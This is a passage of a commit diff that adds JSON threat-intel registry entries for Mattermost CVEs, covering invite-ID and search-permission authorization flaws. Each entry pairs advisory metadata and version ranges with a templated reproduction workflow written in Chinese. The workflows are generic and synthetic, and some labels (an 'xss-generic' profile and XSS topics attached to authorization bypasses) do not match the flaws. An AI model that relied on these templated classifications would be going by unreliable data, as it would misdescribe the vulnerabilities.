"mattermost--repo--github-com-mattermost-mattermost-server--5-3-2-0-20260113182106-a18b80ba4c32",
"mattermost--repo--github-com-mattermost-mattermost-server--10-11-11",
"mattermost--repo--github-com-mattermost-mattermost-server--11-2-3",
"mattermost--repo--github-com-mattermost-mattermost-server--11-3-1",
"mattermost--repo--github-com-mattermost-mattermost-server--10-11-11-incompatible",
"mattermost--repo--github-com-mattermost-mattermost-server--11-2-3-incompatible",
"mattermost--repo--github-com-mattermost-mattermost-server--11-3-1-incompatible"
],
"patched_version_refs": [
"mattermost--repo--github-com-mattermost-mattermost-server--8-0-0-20260113182106-a18b80ba4c32"
],
"version_sync_confidence": "high",
"advisory_scope": "repo",
"version_confidence": "high",
"version_gap_reason": "",
"version_resolution_needed": false,
"workflow": {
"workflow_id": "mattermost--CVE-2026-2458--workflow",
"vuln_family": "unknown",
"entry_surface": "repo-surface",
"preconditions": [
"\u4ec5\u5728 lab-local\u3001lab-public \u6216\u660e\u786e\u6388\u6743\u76ee\u6807\u4e2d\u6267\u884c\u3002",
"\u786e\u8ba4\u76ee\u6807\u547d\u4e2d\u7248\u672c\u65ad\u8a00: introduced=0, fixed<8.0.0-20260113182106-a18b80ba4c32, introduced=0, fixed<5.3.2-0.20260113182106-a18b80ba4c32, introduced=10.11.0-rc1, fixed<10.11.11",
"\u82e5\u5bf9\u8c61\u5c5e\u4e8e `repo`\uff0c\u5148\u786e\u8ba4\u6269\u5c55/\u4ed3\u5e93/\u5305\u5df2\u542f\u7528\u5e76\u5904\u4e8e\u53d7\u5f71\u54cd\u7248\u672c\u3002"
],
"required_role": "unknown",
"affected_version_assertion": [
"introduced=0, fixed<8.0.0-20260113182106-a18b80ba4c32",
"introduced=0, fixed<5.3.2-0.20260113182106-a18b80ba4c32",
"introduced=10.11.0-rc1, fixed<10.11.11",
"introduced=11.2.0-rc1, fixed<11.2.3",
"introduced=11.3.0-rc1, fixed<11.3.1",
"introduced=10.11.0-rc1+incompatible, fixed<10.11.11+incompatible",
"introduced=0"
],
"trigger_vector": "\u5bf9 `unknown` \u5bb6\u65cf\u5165\u53e3\u6295\u9012\u6700\u5c0f\u5316\u3001\u53ef\u5ba1\u8ba1\u3001\u53ef\u56de\u6eda\u7684\u53d7\u63a7\u8f93\u5165\uff0c\u6bd4\u8f83\u4fee\u590d\u524d\u540e\u5dee\u5f02\u3002",
"request_or_ui_path": [
"/repo"
],
"input_shape": "\u63d0\u4ea4\u6700\u5c0f\u5316\u3001\u53ef\u5ba1\u8ba1\u3001\u53ef\u56de\u6eda\u7684\u53d7\u63a7\u8f93\u5165\u3002",
"expected_unsafe_behavior": "\u76ee\u6807\u8868\u73b0\u51fa\u8d85\u51fa\u8bbe\u8ba1\u8fb9\u754c\u7684\u884c\u4e3a\u3002",
"server_evidence_points": [
"\u5e94\u7528\u65e5\u5fd7\u4e2d\u7684\u547d\u4e2d\u8def\u5f84\u3001\u9274\u6743\u51b3\u7b56\u548c\u5f02\u5e38\u6808",
"\u53cd\u5411\u4ee3\u7406\u6216\u8fb9\u754c\u5c42\u65e5\u5fd7\u4e2d\u7684\u8bf7\u6c42\u5934\u3001\u6765\u6e90 IP \u4e0e\u8def\u7531\u51b3\u7b56"
],
"browser_evidence_points": [
"\u57fa\u7ebf\u622a\u56fe\u4e0e\u653b\u51fb\u540e\u622a\u56fe\u7684 DOM/\u89c6\u89c9\u5dee\u5f02",
"console\u3001network \u4e0e response metadata \u4e2d\u7684\u5f02\u5e38\u4fe1\u53f7"
],
"db_or_fs_evidence_points": [
"\u6570\u636e\u5e93\u4e2d\u65b0\u589e/\u8d8a\u6743\u8bfb\u53d6\u7684\u6d4b\u8bd5\u6570\u636e",
"\u6587\u4ef6\u7cfb\u7edf\u4e2d\u65b0\u589e\u4e0a\u4f20\u6837\u672c\u3001\u7f13\u5b58\u6761\u76ee\u6216\u8d8a\u6743\u8bfb\u53d6\u75d5\u8ff9"
],
"detection_signals": [
"WAF / reverse proxy \u5f02\u5e38\u65e5\u5fd7\u3001\u8bbf\u95ee\u65e5\u5fd7\u548c\u544a\u8b66",
"\u5e94\u7528\u5ba1\u8ba1\u65e5\u5fd7\u4e2d\u7684\u6743\u9650\u9519\u8bef\u3001\u91cd\u5b9a\u5411\u5f02\u5e38\u3001\u6a21\u677f\u6e32\u67d3\u6216\u4e0a\u4f20\u843d\u76d8\u4e8b\u4ef6"
],
"mitigation_summary": "\u4f18\u5148\u5347\u7ea7\u5230\u4fee\u590d\u7248\u672c\uff0c\u5e76\u540c\u65f6\u6536\u7d27\u8f93\u5165\u6821\u9a8c\u3001\u670d\u52a1\u7aef\u9274\u6743\u3001\u4ee3\u7406\u4fe1\u4efb\u8fb9\u754c\u3001\u6269\u5c55\u5b89\u88c5\u4fe1\u4efb\u548c\u5ba1\u8ba1\u65e5\u5fd7\u3002",
"patch_validation_steps": [
"\u786e\u8ba4\u76ee\u6807\u7248\u672c\u4ece `introduced=0, fixed<8.0.0-20260113182106-a18b80ba4c32, introduced=0, fixed<5.3.2-0.20260113182106-a18b80ba4c32, introduced=10.11.0-rc1, fixed<10.11.11` \u5347\u7ea7\u6216\u56de\u79fb\u5230 `8.0.0-20260113182106-a18b80ba4c32`\u3002",
"\u4fdd\u7559\u540c\u4e00\u7ec4\u53d7\u63a7\u8f93\u5165\uff0c\u5728\u4fee\u590d\u524d\u540e\u5206\u522b\u6267\u884c\u5e76\u6bd4\u5bf9\u54cd\u5e94\u3001\u65e5\u5fd7\u4e0e\u6d4f\u89c8\u5668\u8bc1\u636e\u3002",
"\u786e\u8ba4\u4fee\u590d\u540e\u4ec5\u4fdd\u7559\u9884\u671f\u4e1a\u52a1\u884c\u4e3a\uff0c\u4e0d\u518d\u89e6\u53d1\u8d8a\u6743\u3001\u56de\u663e\u3001\u5f02\u5e38\u6e32\u67d3\u6216\u9519\u8bef\u8bf7\u6c42\u3002",
"\u8865\u5145 `unknown` \u65cf\u81ea\u52a8\u5316\u56de\u5f52\uff0c\u907f\u514d\u540c\u7c7b\u8def\u5f84\u5728\u63d2\u4ef6\u3001\u4e3b\u9898\u6216\u4ee3\u7406\u94fe\u4e2d\u56de\u5f52\u3002"
],
"lab_safety_notes": [
"\u53ea\u4f7f\u7528\u56de\u73af\u5730\u5740\u3001\u54e8\u5175\u76ee\u6807\u3001\u65e0\u5bb3\u6837\u672c\u6216\u53ef\u56de\u6eda\u6d4b\u8bd5\u6570\u636e\u3002",
"\u7981\u6b62\u9020\u6210\u6301\u4e45\u7834\u574f\u3001\u8d8a\u6743\u4e0b\u8f7d\u771f\u5b9e\u6570\u636e\u6216\u4e0d\u53ef\u56de\u6eda side effect\u3002",
"\u5982\u9700\u6d4f\u89c8\u5668\u8bc1\u636e\uff0c\u4fdd\u7559 baseline / proof \u4e24\u4efd\u5feb\u7167\u4ee5\u53ca console / network \u8bb0\u5f55\u3002"
],
"review_state": "ready"
},
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"historical_status": null,
"latest_status": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "xss-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Mattermost"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 2,
"entity_ref_count": 2,
"advisory_scope": "repo",
"version_confidence": "high",
"workflow_id": "mattermost--CVE-2026-2458--workflow"
}
}

232
08-threat-intel/registry/advisories/mattermost--CVE-2026-2463.json 普通文件
查看文件

@@ -0,0 +1,232 @@
{
"canonical_id": "mattermost--CVE-2026-2463",
"system_id": "mattermost",
"display_name": "Mattermost",
"category": "platforms",
"advisory_mode": "core",
"title": "Mattermost fails to filter invite IDs based on user permissions",
"summary": "Mattermost versions 11.3.x <= 11.3.0, 11.2.x <= 11.2.2, 10.11.x <= 10.11.10 fail to filter invite IDs based on user permissions, which allows regular users to bypass access control restrictions and register unauthorized accounts via leaked invite IDs during team creation. Mattermost Advisory ID: MMSA-2025-00565",
"published_at": "2026-03-16T15:30:43Z",
"updated_at": "2026-03-23T18:56:08.610141Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "ecosystem-authority",
"official_source_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2463",
"secondary_source_urls": [
"https://github.com/advisories/GHSA-fx49-m253-27jj",
"https://github.com/mattermost/mattermost/commit/cc427af41b2a8d3a552d8dc42978831dcfecc1d8",
"https://github.com/mattermost/mattermost",
"https://mattermost.com/security-updates"
],
"aliases": [
"CVE-2026-2463",
"GO-2026-4735",
"GHSA-fx49-m253-27jj"
],
"cve_ids": [
"CVE-2026-2463"
],
"ghsa_ids": [
"GHSA-fx49-m253-27jj"
],
"osv_ids": [
"GHSA-fx49-m253-27jj",
"GO-2026-4735"
],
"affected_versions": [
"introduced=0, fixed<8.0.0-20260105134819-cc427af41b2a",
"introduced=0, fixed<5.3.2-0.20260105134819-cc427af41b2a",
"introduced=10.11.0-rc1, fixed<10.11.11",
"introduced=11.2.0-rc1, fixed<11.2.3",
"introduced=11.3.0-rc1, fixed<11.3.1",
"introduced=10.11.0-rc1+incompatible, fixed<10.11.11+incompatible",
"introduced=0"
],
"fixed_versions": [
"8.0.0-20260105134819-cc427af41b2a",
"5.3.2-0.20260105134819-cc427af41b2a",
"10.11.11",
"11.2.3",
"11.3.1",
"10.11.11+incompatible",
"11.2.3+incompatible",
"11.3.1+incompatible"
],
"package_name": "github.com/mattermost/mattermost-server",
"render_markdown": true,
"case_path": "07-framework-security/platforms/mattermost/cases/mattermost-cve-2026-2463.md",
"secure_code_topics": [
"authz-server-side-recheck",
"xss-output-encoding",
"token-cookie-storage",
"dependency-upgrade-policy"
],
"status": "generated",
"triage_reasons": [],
"entity_refs": [
{
"entity_id": "mattermost",
"entity_type": "system",
"relation": "root-system",
"root_system_id": "mattermost",
"official": true
},
{
"entity_id": "mattermost--repo--github-com-mattermost-mattermost-server",
"entity_type": "repo",
"relation": "affected-component",
"root_system_id": "mattermost",
"official": false
}
],
"affected_components": [
{
"name": "mattermost / mattermost-server",
"entity_id": "mattermost--repo--github-com-mattermost-mattermost-server",
"scope": "repo",
"package_name": "github.com/mattermost/mattermost-server",
"official": false
}
],
"affected_version_ranges": [
"introduced=0, fixed<8.0.0-20260105134819-cc427af41b2a",
"introduced=0, fixed<5.3.2-0.20260105134819-cc427af41b2a",
"introduced=10.11.0-rc1, fixed<10.11.11",
"introduced=11.2.0-rc1, fixed<11.2.3",
"introduced=11.3.0-rc1, fixed<11.3.1",
"introduced=10.11.0-rc1+incompatible, fixed<10.11.11+incompatible",
"introduced=0"
],
"fixed_version_ranges": [
"8.0.0-20260105134819-cc427af41b2a",
"5.3.2-0.20260105134819-cc427af41b2a",
"10.11.11",
"11.2.3",
"11.3.1",
"10.11.11+incompatible",
"11.2.3+incompatible",
"11.3.1+incompatible"
],
"introduced_version": "introduced=0",
"patched_version": "8.0.0-20260105134819-cc427af41b2a",
"version_evidence_sources": [
"https://nvd.nist.gov/vuln/detail/CVE-2026-2463",
"https://github.com/advisories/GHSA-fx49-m253-27jj",
"https://github.com/mattermost/mattermost/commit/cc427af41b2a8d3a552d8dc42978831dcfecc1d8",
"https://github.com/mattermost/mattermost",
"https://mattermost.com/security-updates"
],
"affected_version_refs": [
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-0-fixed-8-0-0-20260105134819-cc427af41b2a",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-0-fixed-5-3-2-0-20260105134819-cc427af41b2a",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-10-11-0-rc1-fixed-10-11-11",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-11-2-0-rc1-fixed-11-2-3",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-11-3-0-rc1-fixed-11-3-1",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-10-11-0-rc1-incompatible-fixed-10-11-11-incompatible",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-0"
],
"fixed_version_refs": [
"mattermost--repo--github-com-mattermost-mattermost-server--8-0-0-20260105134819-cc427af41b2a",
"mattermost--repo--github-com-mattermost-mattermost-server--5-3-2-0-20260105134819-cc427af41b2a",
"mattermost--repo--github-com-mattermost-mattermost-server--10-11-11",
"mattermost--repo--github-com-mattermost-mattermost-server--11-2-3",
"mattermost--repo--github-com-mattermost-mattermost-server--11-3-1",
"mattermost--repo--github-com-mattermost-mattermost-server--10-11-11-incompatible",
"mattermost--repo--github-com-mattermost-mattermost-server--11-2-3-incompatible",
"mattermost--repo--github-com-mattermost-mattermost-server--11-3-1-incompatible"
],
"patched_version_refs": [
"mattermost--repo--github-com-mattermost-mattermost-server--8-0-0-20260105134819-cc427af41b2a"
],
"version_sync_confidence": "high",
"advisory_scope": "repo",
"version_confidence": "high",
"version_gap_reason": "",
"version_resolution_needed": false,
"workflow": {
"workflow_id": "mattermost--CVE-2026-2463--workflow",
"vuln_family": "authz-bypass",
"entry_surface": "privileged-route-or-object-reference",
"preconditions": [
"\u4ec5\u5728 lab-local\u3001lab-public \u6216\u660e\u786e\u6388\u6743\u76ee\u6807\u4e2d\u6267\u884c\u3002",
"\u786e\u8ba4\u76ee\u6807\u547d\u4e2d\u7248\u672c\u65ad\u8a00: introduced=0, fixed<8.0.0-20260105134819-cc427af41b2a, introduced=0, fixed<5.3.2-0.20260105134819-cc427af41b2a, introduced=10.11.0-rc1, fixed<10.11.11",
"\u82e5\u5bf9\u8c61\u5c5e\u4e8e `repo`\uff0c\u5148\u786e\u8ba4\u6269\u5c55/\u4ed3\u5e93/\u5305\u5df2\u542f\u7528\u5e76\u5904\u4e8e\u53d7\u5f71\u54cd\u7248\u672c\u3002"
],
"required_role": "cross-tenant-or-low-privileged-user",
"affected_version_assertion": [
"introduced=0, fixed<8.0.0-20260105134819-cc427af41b2a",
"introduced=0, fixed<5.3.2-0.20260105134819-cc427af41b2a",
"introduced=10.11.0-rc1, fixed<10.11.11",
"introduced=11.2.0-rc1, fixed<11.2.3",
"introduced=11.3.0-rc1, fixed<11.3.1",
"introduced=10.11.0-rc1+incompatible, fixed<10.11.11+incompatible",
"introduced=0"
],
"trigger_vector": "\u5bf9 `authz-bypass` \u5bb6\u65cf\u5165\u53e3\u6295\u9012\u6700\u5c0f\u5316\u3001\u53ef\u5ba1\u8ba1\u3001\u53ef\u56de\u6eda\u7684\u53d7\u63a7\u8f93\u5165\uff0c\u6bd4\u8f83\u4fee\u590d\u524d\u540e\u5dee\u5f02\u3002",
"request_or_ui_path": [
"/admin/*",
"/api/private/*",
"/tenant/*"
],
"input_shape": "\u4f7f\u7528\u4f4e\u6743\u9650\u8eab\u4efd\u8bbf\u95ee\u9ad8\u6743\u9650\u5bf9\u8c61\u6216\u8de8\u79df\u6237\u8d44\u6e90\u3002",
"expected_unsafe_behavior": "\u4f4e\u6743\u9650\u8eab\u4efd\u53ef\u8bbf\u95ee\u672c\u4e0d\u5e94\u53ef\u89c1\u7684\u6570\u636e\u6216\u64cd\u4f5c\u3002",
"server_evidence_points": [
"\u5e94\u7528\u65e5\u5fd7\u4e2d\u7684\u547d\u4e2d\u8def\u5f84\u3001\u9274\u6743\u51b3\u7b56\u548c\u5f02\u5e38\u6808",
"\u53cd\u5411\u4ee3\u7406\u6216\u8fb9\u754c\u5c42\u65e5\u5fd7\u4e2d\u7684\u8bf7\u6c42\u5934\u3001\u6765\u6e90 IP \u4e0e\u8def\u7531\u51b3\u7b56"
],
"browser_evidence_points": [
"\u57fa\u7ebf\u622a\u56fe\u4e0e\u653b\u51fb\u540e\u622a\u56fe\u7684 DOM/\u89c6\u89c9\u5dee\u5f02",
"console\u3001network \u4e0e response metadata \u4e2d\u7684\u5f02\u5e38\u4fe1\u53f7"
],
"db_or_fs_evidence_points": [
"\u6570\u636e\u5e93\u4e2d\u65b0\u589e/\u8d8a\u6743\u8bfb\u53d6\u7684\u6d4b\u8bd5\u6570\u636e",
"\u6587\u4ef6\u7cfb\u7edf\u4e2d\u65b0\u589e\u4e0a\u4f20\u6837\u672c\u3001\u7f13\u5b58\u6761\u76ee\u6216\u8d8a\u6743\u8bfb\u53d6\u75d5\u8ff9"
],
"detection_signals": [
"WAF / reverse proxy \u5f02\u5e38\u65e5\u5fd7\u3001\u8bbf\u95ee\u65e5\u5fd7\u548c\u544a\u8b66",
"\u5e94\u7528\u5ba1\u8ba1\u65e5\u5fd7\u4e2d\u7684\u6743\u9650\u9519\u8bef\u3001\u91cd\u5b9a\u5411\u5f02\u5e38\u3001\u6a21\u677f\u6e32\u67d3\u6216\u4e0a\u4f20\u843d\u76d8\u4e8b\u4ef6"
],
"mitigation_summary": "\u4f18\u5148\u5347\u7ea7\u5230\u4fee\u590d\u7248\u672c\uff0c\u5e76\u540c\u65f6\u6536\u7d27\u8f93\u5165\u6821\u9a8c\u3001\u670d\u52a1\u7aef\u9274\u6743\u3001\u4ee3\u7406\u4fe1\u4efb\u8fb9\u754c\u3001\u6269\u5c55\u5b89\u88c5\u4fe1\u4efb\u548c\u5ba1\u8ba1\u65e5\u5fd7\u3002",
"patch_validation_steps": [
"\u786e\u8ba4\u76ee\u6807\u7248\u672c\u4ece `introduced=0, fixed<8.0.0-20260105134819-cc427af41b2a, introduced=0, fixed<5.3.2-0.20260105134819-cc427af41b2a, introduced=10.11.0-rc1, fixed<10.11.11` \u5347\u7ea7\u6216\u56de\u79fb\u5230 `8.0.0-20260105134819-cc427af41b2a`\u3002",
"\u4fdd\u7559\u540c\u4e00\u7ec4\u53d7\u63a7\u8f93\u5165\uff0c\u5728\u4fee\u590d\u524d\u540e\u5206\u522b\u6267\u884c\u5e76\u6bd4\u5bf9\u54cd\u5e94\u3001\u65e5\u5fd7\u4e0e\u6d4f\u89c8\u5668\u8bc1\u636e\u3002",
"\u786e\u8ba4\u4fee\u590d\u540e\u4ec5\u4fdd\u7559\u9884\u671f\u4e1a\u52a1\u884c\u4e3a\uff0c\u4e0d\u518d\u89e6\u53d1\u8d8a\u6743\u3001\u56de\u663e\u3001\u5f02\u5e38\u6e32\u67d3\u6216\u9519\u8bef\u8bf7\u6c42\u3002",
"\u8865\u5145 `authz-bypass` \u65cf\u81ea\u52a8\u5316\u56de\u5f52\uff0c\u907f\u514d\u540c\u7c7b\u8def\u5f84\u5728\u63d2\u4ef6\u3001\u4e3b\u9898\u6216\u4ee3\u7406\u94fe\u4e2d\u56de\u5f52\u3002"
],
"lab_safety_notes": [
"\u53ea\u4f7f\u7528\u56de\u73af\u5730\u5740\u3001\u54e8\u5175\u76ee\u6807\u3001\u65e0\u5bb3\u6837\u672c\u6216\u53ef\u56de\u6eda\u6d4b\u8bd5\u6570\u636e\u3002",
"\u7981\u6b62\u9020\u6210\u6301\u4e45\u7834\u574f\u3001\u8d8a\u6743\u4e0b\u8f7d\u771f\u5b9e\u6570\u636e\u6216\u4e0d\u53ef\u56de\u6eda side effect\u3002",
"\u5982\u9700\u6d4f\u89c8\u5668\u8bc1\u636e\uff0c\u4fdd\u7559 baseline / proof \u4e24\u4efd\u5feb\u7167\u4ee5\u53ca console / network \u8bb0\u5f55\u3002"
],
"review_state": "ready"
},
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"historical_status": null,
"latest_status": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "xss-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Mattermost"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 2,
"entity_ref_count": 2,
"advisory_scope": "repo",
"version_confidence": "high",
"workflow_id": "mattermost--CVE-2026-2463--workflow"
}
}

230
08-threat-intel/registry/advisories/mattermost--CVE-2026-24692.json 普通文件
查看文件

@@ -0,0 +1,230 @@
{
"canonical_id": "mattermost--CVE-2026-24692",
"system_id": "mattermost",
"display_name": "Mattermost",
"category": "platforms",
"advisory_mode": "core",
"title": "Mattermost fails to properly enforce read permissions in search API endpoints",
"summary": "Mattermost versions 11.3.x <= 11.3.0, 11.2.x <= 11.2.2, 10.11.x <= 10.11.10 fail to properly enforce read permissions in search API endpoints which allows guest users without read permissions to access posts and files in channels via search API requests. Mattermost Advisory ID: MMSA-2025-00554",
"published_at": "2026-03-16T15:30:47Z",
"updated_at": "2026-03-23T18:55:57.125165Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "ecosystem-authority",
"official_source_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24692",
"secondary_source_urls": [
"https://github.com/advisories/GHSA-cwfj-642j-gfh4",
"https://github.com/mattermost/mattermost/commit/0481bd1fb04584db97eca45fd58ebd06c8200df4",
"https://github.com/mattermost/mattermost",
"https://mattermost.com/security-updates"
],
"aliases": [
"CVE-2026-24692",
"GO-2026-4745",
"GHSA-cwfj-642j-gfh4"
],
"cve_ids": [
"CVE-2026-24692"
],
"ghsa_ids": [
"GHSA-cwfj-642j-gfh4"
],
"osv_ids": [
"GHSA-cwfj-642j-gfh4",
"GO-2026-4745"
],
"affected_versions": [
"introduced=0, fixed<8.0.0-20260107142155-0481bd1fb045",
"introduced=0, fixed<5.3.2-0.20260107142155-0481bd1fb045",
"introduced=10.11.0-rc1, fixed<10.11.11",
"introduced=11.2.0-rc1, fixed<11.2.3",
"introduced=11.3.0-rc1, fixed<11.3.1",
"introduced=10.11.0-rc1+incompatible, fixed<10.11.11+incompatible",
"introduced=0"
],
"fixed_versions": [
"8.0.0-20260107142155-0481bd1fb045",
"5.3.2-0.20260107142155-0481bd1fb045",
"10.11.11",
"11.2.3",
"11.3.1",
"10.11.11+incompatible",
"11.2.3+incompatible",
"11.3.1+incompatible"
],
"package_name": "github.com/mattermost/mattermost-server",
"render_markdown": true,
"case_path": "07-framework-security/platforms/mattermost/cases/mattermost-cve-2026-24692.md",
"secure_code_topics": [
"authz-server-side-recheck",
"xss-output-encoding",
"token-cookie-storage",
"dependency-upgrade-policy"
],
"status": "generated",
"triage_reasons": [],
"entity_refs": [
{
"entity_id": "mattermost",
"entity_type": "system",
"relation": "root-system",
"root_system_id": "mattermost",
"official": true
},
{
"entity_id": "mattermost--repo--github-com-mattermost-mattermost-server",
"entity_type": "repo",
"relation": "affected-component",
"root_system_id": "mattermost",
"official": false
}
],
"affected_components": [
{
"name": "mattermost / mattermost-server",
"entity_id": "mattermost--repo--github-com-mattermost-mattermost-server",
"scope": "repo",
"package_name": "github.com/mattermost/mattermost-server",
"official": false
}
],
"affected_version_ranges": [
"introduced=0, fixed<8.0.0-20260107142155-0481bd1fb045",
"introduced=0, fixed<5.3.2-0.20260107142155-0481bd1fb045",
"introduced=10.11.0-rc1, fixed<10.11.11",
"introduced=11.2.0-rc1, fixed<11.2.3",
"introduced=11.3.0-rc1, fixed<11.3.1",
"introduced=10.11.0-rc1+incompatible, fixed<10.11.11+incompatible",
"introduced=0"
],
"fixed_version_ranges": [
"8.0.0-20260107142155-0481bd1fb045",
"5.3.2-0.20260107142155-0481bd1fb045",
"10.11.11",
"11.2.3",
"11.3.1",
"10.11.11+incompatible",
"11.2.3+incompatible",
"11.3.1+incompatible"
],
"introduced_version": "introduced=0",
"patched_version": "8.0.0-20260107142155-0481bd1fb045",
"version_evidence_sources": [
"https://nvd.nist.gov/vuln/detail/CVE-2026-24692",
"https://github.com/advisories/GHSA-cwfj-642j-gfh4",
"https://github.com/mattermost/mattermost/commit/0481bd1fb04584db97eca45fd58ebd06c8200df4",
"https://github.com/mattermost/mattermost",
"https://mattermost.com/security-updates"
],
"affected_version_refs": [
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-0-fixed-8-0-0-20260107142155-0481bd1fb045",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-0-fixed-5-3-2-0-20260107142155-0481bd1fb045",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-10-11-0-rc1-fixed-10-11-11",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-11-2-0-rc1-fixed-11-2-3",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-11-3-0-rc1-fixed-11-3-1",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-10-11-0-rc1-incompatible-fixed-10-11-11-incompatible",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-0"
],
"fixed_version_refs": [
"mattermost--repo--github-com-mattermost-mattermost-server--8-0-0-20260107142155-0481bd1fb045",
"mattermost--repo--github-com-mattermost-mattermost-server--5-3-2-0-20260107142155-0481bd1fb045",
"mattermost--repo--github-com-mattermost-mattermost-server--10-11-11",
"mattermost--repo--github-com-mattermost-mattermost-server--11-2-3",
"mattermost--repo--github-com-mattermost-mattermost-server--11-3-1",
"mattermost--repo--github-com-mattermost-mattermost-server--10-11-11-incompatible",
"mattermost--repo--github-com-mattermost-mattermost-server--11-2-3-incompatible",
"mattermost--repo--github-com-mattermost-mattermost-server--11-3-1-incompatible"
],
"patched_version_refs": [
"mattermost--repo--github-com-mattermost-mattermost-server--8-0-0-20260107142155-0481bd1fb045"
],
"version_sync_confidence": "high",
"advisory_scope": "repo",
"version_confidence": "high",
"version_gap_reason": "",
"version_resolution_needed": false,
"workflow": {
"workflow_id": "mattermost--CVE-2026-24692--workflow",
"vuln_family": "unknown",
"entry_surface": "repo-surface",
"preconditions": [
"\u4ec5\u5728 lab-local\u3001lab-public \u6216\u660e\u786e\u6388\u6743\u76ee\u6807\u4e2d\u6267\u884c\u3002",
"\u786e\u8ba4\u76ee\u6807\u547d\u4e2d\u7248\u672c\u65ad\u8a00: introduced=0, fixed<8.0.0-20260107142155-0481bd1fb045, introduced=0, fixed<5.3.2-0.20260107142155-0481bd1fb045, introduced=10.11.0-rc1, fixed<10.11.11",
"\u82e5\u5bf9\u8c61\u5c5e\u4e8e `repo`\uff0c\u5148\u786e\u8ba4\u6269\u5c55/\u4ed3\u5e93/\u5305\u5df2\u542f\u7528\u5e76\u5904\u4e8e\u53d7\u5f71\u54cd\u7248\u672c\u3002"
],
"required_role": "unknown",
"affected_version_assertion": [
"introduced=0, fixed<8.0.0-20260107142155-0481bd1fb045",
"introduced=0, fixed<5.3.2-0.20260107142155-0481bd1fb045",
"introduced=10.11.0-rc1, fixed<10.11.11",
"introduced=11.2.0-rc1, fixed<11.2.3",
"introduced=11.3.0-rc1, fixed<11.3.1",
"introduced=10.11.0-rc1+incompatible, fixed<10.11.11+incompatible",
"introduced=0"
],
"trigger_vector": "\u5bf9 `unknown` \u5bb6\u65cf\u5165\u53e3\u6295\u9012\u6700\u5c0f\u5316\u3001\u53ef\u5ba1\u8ba1\u3001\u53ef\u56de\u6eda\u7684\u53d7\u63a7\u8f93\u5165\uff0c\u6bd4\u8f83\u4fee\u590d\u524d\u540e\u5dee\u5f02\u3002",
"request_or_ui_path": [
"/repo"
],
"input_shape": "\u63d0\u4ea4\u6700\u5c0f\u5316\u3001\u53ef\u5ba1\u8ba1\u3001\u53ef\u56de\u6eda\u7684\u53d7\u63a7\u8f93\u5165\u3002",
"expected_unsafe_behavior": "\u76ee\u6807\u8868\u73b0\u51fa\u8d85\u51fa\u8bbe\u8ba1\u8fb9\u754c\u7684\u884c\u4e3a\u3002",
"server_evidence_points": [
"\u5e94\u7528\u65e5\u5fd7\u4e2d\u7684\u547d\u4e2d\u8def\u5f84\u3001\u9274\u6743\u51b3\u7b56\u548c\u5f02\u5e38\u6808",
"\u53cd\u5411\u4ee3\u7406\u6216\u8fb9\u754c\u5c42\u65e5\u5fd7\u4e2d\u7684\u8bf7\u6c42\u5934\u3001\u6765\u6e90 IP \u4e0e\u8def\u7531\u51b3\u7b56"
],
"browser_evidence_points": [
"\u57fa\u7ebf\u622a\u56fe\u4e0e\u653b\u51fb\u540e\u622a\u56fe\u7684 DOM/\u89c6\u89c9\u5dee\u5f02",
"console\u3001network \u4e0e response metadata \u4e2d\u7684\u5f02\u5e38\u4fe1\u53f7"
],
"db_or_fs_evidence_points": [
"\u6570\u636e\u5e93\u4e2d\u65b0\u589e/\u8d8a\u6743\u8bfb\u53d6\u7684\u6d4b\u8bd5\u6570\u636e",
"\u6587\u4ef6\u7cfb\u7edf\u4e2d\u65b0\u589e\u4e0a\u4f20\u6837\u672c\u3001\u7f13\u5b58\u6761\u76ee\u6216\u8d8a\u6743\u8bfb\u53d6\u75d5\u8ff9"
],
"detection_signals": [
"WAF / reverse proxy \u5f02\u5e38\u65e5\u5fd7\u3001\u8bbf\u95ee\u65e5\u5fd7\u548c\u544a\u8b66",
"\u5e94\u7528\u5ba1\u8ba1\u65e5\u5fd7\u4e2d\u7684\u6743\u9650\u9519\u8bef\u3001\u91cd\u5b9a\u5411\u5f02\u5e38\u3001\u6a21\u677f\u6e32\u67d3\u6216\u4e0a\u4f20\u843d\u76d8\u4e8b\u4ef6"
],
"mitigation_summary": "\u4f18\u5148\u5347\u7ea7\u5230\u4fee\u590d\u7248\u672c\uff0c\u5e76\u540c\u65f6\u6536\u7d27\u8f93\u5165\u6821\u9a8c\u3001\u670d\u52a1\u7aef\u9274\u6743\u3001\u4ee3\u7406\u4fe1\u4efb\u8fb9\u754c\u3001\u6269\u5c55\u5b89\u88c5\u4fe1\u4efb\u548c\u5ba1\u8ba1\u65e5\u5fd7\u3002",
"patch_validation_steps": [
"\u786e\u8ba4\u76ee\u6807\u7248\u672c\u4ece `introduced=0, fixed<8.0.0-20260107142155-0481bd1fb045, introduced=0, fixed<5.3.2-0.20260107142155-0481bd1fb045, introduced=10.11.0-rc1, fixed<10.11.11` \u5347\u7ea7\u6216\u56de\u79fb\u5230 `8.0.0-20260107142155-0481bd1fb045`\u3002",
